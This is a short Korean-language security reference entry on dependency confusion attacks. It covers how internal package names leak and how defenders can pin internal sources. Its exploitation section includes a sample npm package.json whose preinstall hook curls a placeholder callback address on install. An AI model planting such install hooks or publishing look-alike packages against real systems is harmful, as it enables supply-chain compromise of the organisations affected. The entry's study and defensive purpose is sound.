🔍 Introduction

Dependency Confusion은 supply chain substitution attack 으로도 불리며 서비스에서 사용중인 내부 패키지와 동일한 이름의 패키지를 등록하여 악의적인 패키지가 설치 되도록 유도하는 공격입니다.

gem, pip, npm 등 패키지 매니저에 따라 다르지만, 정확하게 명시되지 않은 상태에서 외부/내부에 동일한 이름의 패키지가 있는 경우 외부에서 패키지를 가져오기도 합니다. 이를 이용한 공격 방법입니다.

e.g

[ packages ]
internal: xspear
public: xspear

[ gem install ]
gem install xspear (installed from public)

🗡 Offensive techniques

Detect

github 등 소스코드 repository에서 직접 internal 패키지를 확인하거나 /package.json , composer.json 등 외부에 의도하지 않게 노출되는 패키지 관련 파일을 참고하여 패키지 관리 도구에 등록되지 않은 이름이 있는 경우 Dependency Confusion의 가능성이 존재합니다.

Exploitation

npm. gem, pip 등 패키지 매니저에 공격코드를 포함한 패키지를 등록하는 형태로 exploit할 수 있습니다.

npm 패키지를 예시로 들어보면 아래와 같습니다. npm 패키지에 필요한 package.json 파일과 main 파일인 js 파일을 하나 만든 후 scripts에 원하는 공격코드를 넣어두고 internal 패키지와 동일한 이름으로 public 패키지를 생성하고 등록하면 됩니다.

index.js

module.exports.hacked = function () {
    return "hacked"
}

package.json

{
  "name": "your-module-name",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "preinstall": "curl -i -k https://your-callback-address"
  },
  "author": "hahwul",
  "license": "MIT"
}

🛡 Defensive techniques

패키지 매니저에서 직접 internal 패키지를 위한 절대경로를 지정할 수 있는 경우 이를 통해서 임의로 외부 패키지가 설치되는 것을 방지할 수 있습니다. 또한 package.json 같이 서비스에서 사용하는 dependency를 알 수 있는 파일은 외부에 노출되지 않도록 제한하는 것이 좋습니다.

🕹 Tools

• package.json - nuclei template
• composer.json - nuclei template
• github gemfiles - nuclei template

📌 References

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Dependency%20Confusion